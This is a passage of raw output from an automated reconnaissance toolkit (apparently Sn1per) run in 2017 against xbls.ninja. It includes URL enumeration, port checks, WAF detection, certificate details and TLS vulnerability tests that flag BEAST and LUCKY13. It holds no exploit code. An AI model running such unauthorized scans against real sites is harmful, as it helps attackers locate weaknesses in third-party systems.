- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 16 / 19 ]-[08:14:37] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/african-combo-token-1-day/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 17 / 19 ]-[08:14:38] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product/african-combo-token-7-day/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 18 / 19 ]-[08:14:39] [ - ]
- |_[ + ] Target:: [ https://xbls.ninja/product-category/african-plus-ninja-tokens/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [13-07-2017 08:14:39]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-xbls.ninja.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://xbls.ninja
- The site https://xbls.ninja is behind a CloudFlare
- Number of requests: 1
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- https://xbls.ninja [403 Forbidden] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.27.134.184], Strict-Transport-Security[max-age=15552000], Title[Sucuri WebSite Firewall - Access Denied], UncommonHeaders[x-content-type-options,x-sucuri-id,cf-ray], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginHeartbleed
- PluginOpenSSLCipherSuites
- PluginChromeSha1Deprecation
- PluginCompression
- PluginCertInfo
- PluginSessionRenegotiation
- PluginHSTS
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- xbls.ninja:443 => 104.27.135.184:443
- SCAN RESULTS FOR XBLS.NINJA:443 - 104.27.135.184:443
- ----------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: abfb344f0354964ab4e2a0473d42e02e23acd61d
- Common Name: sni87911.cloudflaressl.com
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
- Not Before: Jul 6 00:00:00 2017 GMT
- Not After: Jan 12 23:59:59 2018 GMT
- Signature Algorithm: ecdsa-with-SHA256
- Public Key Algorithm: id-ecPublicKey
- Key Size: 256 bit
- X509v3 Subject Alternative Name: {'DNS': ['sni87911.cloudflaressl.com', '*.anhaniuso.top', '*.bit.cm', '*.charlottestowels.xyz', '*.daypeada.top', '*.dedinow.com', '*.digitalgiftcodes.com', '*.digitalpaymentgateway.com', '*.giofalco.com', '*.ideal-2vh3g.ga', '*.landsdownefootandankle.com', '*.learnlsp.com', '*.lsp.academy', '*.michaelfearne.com', '*.nanovds.com', '*.pro-palo.ru', '*.scoresbuch.cf', '*.summitvillegoodshopping.ga', '*.swell-fstf8.ml', '*.todaysfamilymagazine.com', '*.txtbattle.ru', '*.usadba-nsk.ru', '*.xbls.ninja', '*.xblsyndicate.ninja', 'anhaniuso.top', 'bit.cm', 'charlottestowels.xyz', 'daypeada.top', 'dedinow.com', 'digitalgiftcodes.com', 'digitalpaymentgateway.com', 'giofalco.com', 'ideal-2vh3g.ga', 'landsdownefootandankle.com', 'learnlsp.com', 'lsp.academy', 'michaelfearne.com', 'nanovds.com', 'pro-palo.ru', 'scoresbuch.cf', 'summitvillegoodshopping.ga', 'swell-fstf8.ml', 'todaysfamilymagazine.com', 'txtbattle.ru', 'usadba-nsk.ru', 'xbls.ninja', 'xblsyndicate.ninja']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['sni87911.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
- * Certificate - OCSP Stapling:
- OCSP Response Status: successful
- Validation w/ Mozilla's CA Store: OK - Response is trusted
- Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
- Cert Status: good
- Cert Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
- This Update: Jul 8 21:50:39 2017 GMT
- Next Update: Jul 15 21:50:39 2017 GMT
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 0.73 S
- ------------------------
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server xbls.ninja on port 443 using SNI name xbls.ninja
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
- Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: ecdsa-with-SHA256
- Subject: sni87911.cloudflaressl.com
- Altnames: DNS:sni87911.cloudflaressl.com, DNS:*.anhaniuso.top, DNS:*.bit.cm, DNS:*.charlottestowels.xyz, DNS:*.daypeada.top, DNS:*.dedinow.com, DNS:*.digitalgiftcodes.com, DNS:*.digitalpaymentgateway.com, DNS:*.giofalco.com, DNS:*.ideal-2vh3g.ga, DNS:*.landsdownefootandankle.com, DNS:*.learnlsp.com, DNS:*.lsp.academy, DNS:*.michaelfearne.com, DNS:*.nanovds.com, DNS:*.pro-palo.ru, DNS:*.scoresbuch.cf, DNS:*.summitvillegoodshopping.ga, DNS:*.swell-fstf8.ml, DNS:*.todaysfamilymagazine.com, DNS:*.txtbattle.ru, DNS:*.usadba-nsk.ru, DNS:*.xbls.ninja, DNS:*.xblsyndicate.ninja, DNS:anhaniuso.top, DNS:bit.cm, DNS:charlottestowels.xyz, DNS:daypeada.top, DNS:dedinow.com, DNS:digitalgiftcodes.com, DNS:digitalpaymentgateway.com, DNS:giofalco.com, DNS:ideal-2vh3g.ga, DNS:landsdownefootandankle.com, DNS:learnlsp.com, DNS:lsp.academy, DNS:michaelfearne.com, DNS:nanovds.com, DNS:pro-palo.ru, DNS:scoresbuch.cf, DNS:summitvillegoodshopping.ga, DNS:swell-fstf8.ml, DNS:todaysfamilymagazine.com, DNS:txtbattle.ru, DNS:usadba-nsk.ru, DNS:xbls.ninja, DNS:xblsyndicate.ninja
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Not valid before: Jul 6 00:00:00 2017 GMT
- Not valid after: Jan 12 23:59:59 2018 GMT
- ###########################################################
- testssl 2.9dev from https://testssl.sh/dev/
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ https://testssl.sh/bugs/
- ###########################################################
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- Testing all IPv4 addresses (port 443): 104.27.134.184 104.27.135.184
- --------------------------------------------------------------------
- Start 2017-07-13 08:14:47 -->> 104.27.134.184:443 (xbls.ninja) <<--
- further IP addresses: 104.27.135.184
- rDNS (104.27.134.184): --
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 offered
- TLS 1.1 offered
- TLS 1.2 offered (OK)
- SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
- HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) not offered (OK)
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
- ECDHE-ECDSA-CHACHA20-POLY1305 ECDHE-ECDSA-AES128-GCM-SHA256
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
- Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Cipher order
- TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES128-SHA256
- ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
- Testing server defaults (Server Hello)
- TLS extensions (standard) "renegotiation info/#65281" "server name/#0" "session ticket/#35"
- "status request/#5" "next protocol/#13172" "EC point formats/#11"
- "extended master secret/#23" "signed certificate timestamps/#18"
- "application layer protocol negotiation/#16"
- Session Ticket RFC 5077 hint 64800 seconds (PFS requires session ticket keys to be rotated <= daily)
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: yes
- TLS clock skew -7166 sec from localtime
- Signature Algorithm ECDSA with SHA256
- Server key size ECDSA 256 bits
- Fingerprint / Serial SHA1 ABFB344F0354964AB4E2A0473D42E02E23ACD61D / CFF571D4DF39A468DFCA6E198BAE1FA7
- SHA256 D42879DD9F8FD059F33D961908A75AEE461869EE1E3A0E3284B7B1A57D8829C9
- Common Name (CN) sni87911.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
- subjectAltName (SAN) sni87911.cloudflaressl.com *.anhaniuso.top *.bit.cm
- *.charlottestowels.xyz *.daypeada.top *.dedinow.com
- *.digitalgiftcodes.com *.digitalpaymentgateway.com *.giofalco.com
- *.ideal-2vh3g.ga *.landsdownefootandankle.com *.learnlsp.com
- *.lsp.academy *.michaelfearne.com *.nanovds.com *.pro-palo.ru
- *.scoresbuch.cf *.summitvillegoodshopping.ga *.swell-fstf8.ml
- *.todaysfamilymagazine.com *.txtbattle.ru *.usadba-nsk.ru *.xbls.ninja
- *.xblsyndicate.ninja anhaniuso.top bit.cm charlottestowels.xyz
- daypeada.top dedinow.com digitalgiftcodes.com digitalpaymentgateway.com
- giofalco.com ideal-2vh3g.ga landsdownefootandankle.com learnlsp.com
- lsp.academy michaelfearne.com nanovds.com pro-palo.ru scoresbuch.cf
- summitvillegoodshopping.ga swell-fstf8.ml todaysfamilymagazine.com
- txtbattle.ru usadba-nsk.ru xbls.ninja xblsyndicate.ninja
- Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
- Trust (hostname) Ok via SAN (SNI mandatory)
- Chain of trust Ok
- EV cert (experimental) no
- Certificate Expiration 183 >= 60 days (2017-07-06 00:00 --> 2018-01-12 23:59 +0000)
- # of certificates provided 3
- Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
- OCSP URI http://ocsp.comodoca4.com
- OCSP stapling offered
- OCSP must staple no
- DNS CAA RR (experimental) --
- Testing HTTP header response @ "/"
- HTTP Status Code 200 OK
- HTTP clock skew -7166 sec from localtime
- Strict Transport Security 180 days=15552000 s, just this domain
- Public Key Pinning --
- Server banner cloudflare-nginx
- Application banner --
- Cookie(s) 1 issued: NOT secure, 1/1 HttpOnly
- Security headers X-Frame-Options SAMEORIGIN
- X-XSS-Protection 1; mode=block
- X-Content-Type-Options nosniff
- Reverse Proxy banner --
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
- Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
- BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
- Can be ignored for static pages or if no secrets in the page
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this port (OK)
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
- BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- LUCKY13 (CVE-2013-0169) VULNERABLE, uses cipher block chaining (CBC) ciphers
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
- xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
- xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
- xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
- xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
- xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
- xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
- xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
- Running client simulations via sockets
- Android 2.3.7 No connection
- Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.2.2 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
- Baidu Jan 2015 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
- Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Firefox 49 XP SP3 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- IE 8 XP No connection
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Java 8b132 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 6.0.4 OS X 10.8.4 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 7 OS X 10.9 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 8 OS X 10.10 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Safari 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
- Done 2017-07-13 08:15:31 [ 46s] -->> 104.27.134.184:443 (xbls.ninja) <<--
- --------------------------------------------------------------------
- Start 2017-07-13 08:15:31 -->> 104.27.135.184:443 (xbls.ninja) <<--
- further IP addresses: 104.27.134.184
- rDNS (104.27.135.184): --
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 offered
- TLS 1.1 offered
- TLS 1.2 offered (OK)
- SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
- HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) not offered (OK)
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
- ECDHE-ECDSA-CHACHA20-POLY1305 ECDHE-ECDSA-AES128-GCM-SHA256
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
- Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
- Cipher order
- TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES128-SHA256
- ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
- Testing server defaults (Server Hello)
- TLS extensions (standard) "renegotiation info/#65281" "server name/#0" "session ticket/#35"
- "status request/#5" "next protocol/#13172" "EC point formats/#11"
- "extended master secret/#23" "signed certificate timestamps/#18"
- "application layer protocol negotiation/#16"
- Session Ticket RFC 5077 hint 64800 seconds (PFS requires session ticket keys to be rotated <= daily)
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: yes
- TLS clock skew -7167 sec from localtime
- Signature Algorithm ECDSA with SHA256
- Server key size ECDSA 256 bits
- Fingerprint / Serial SHA1 ABFB344F0354964AB4E2A0473D42E02E23ACD61D / CFF571D4DF39A468DFCA6E198BAE1FA7
- SHA256 D42879DD9F8FD059F33D961908A75AEE461869EE1E3A0E3284B7B1A57D8829C9
- Common Name (CN) sni87911.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
- subjectAltName (SAN) sni87911.cloudflaressl.com *.anhaniuso.top *.bit.cm
- *.charlottestowels.xyz *.daypeada.top *.dedinow.com
- *.digitalgiftcodes.com *.digitalpaymentgateway.com *.giofalco.com
- *.ideal-2vh3g.ga *.landsdownefootandankle.com *.learnlsp.com
- *.lsp.academy *.michaelfearne.com *.nanovds.com *.pro-palo.ru
- *.scoresbuch.cf *.summitvillegoodshopping.ga *.swell-fstf8.ml
- *.todaysfamilymagazine.com *.txtbattle.ru *.usadba-nsk.ru *.xbls.ninja
- *.xblsyndicate.ninja anhaniuso.top bit.cm charlottestowels.xyz
- daypeada.top dedinow.com digitalgiftcodes.com digitalpaymentgateway.com
- giofalco.com ideal-2vh3g.ga landsdownefootandankle.com learnlsp.com
- lsp.academy michaelfearne.com nanovds.com pro-palo.ru scoresbuch.cf
- summitvillegoodshopping.ga swell-fstf8.ml todaysfamilymagazine.com
- txtbattle.ru usadba-nsk.ru xbls.ninja xblsyndicate.ninja
- Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
- Trust (hostname) Ok via SAN (SNI mandatory)
- Chain of trust Ok
- EV cert (experimental) no
- Certificate Expiration 183 >= 60 days (2017-07-06 00:00 --> 2018-01-12 23:59 +0000)
- # of certificates provided 3
- Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
- OCSP URI http://ocsp.comodoca4.com
- OCSP stapling offered
- OCSP must staple no
- DNS CAA RR (experimental) --
- Testing HTTP header response @ "/"
- HTTP Status Code 200 OK
- HTTP clock skew -7166 sec from localtime
- Strict Transport Security 180 days=15552000 s, just this domain
- Public Key Pinning --
- Server banner cloudflare-nginx
- Application banner --
- Cookie(s) 1 issued: NOT secure, 1/1 HttpOnly
- Security headers X-Frame-Options SAMEORIGIN
- X-XSS-Protection 1; mode=block
- X-Content-Type-Options nosniff
- Reverse Proxy banner --
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
- Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
- BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
- Can be ignored for static pages or if no secrets in the page
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this port (OK)
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
- BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- LUCKY13 (CVE-2013-0169) VULNERABLE, uses cipher block chaining (CBC) ciphers
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
- xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
- xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
- xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
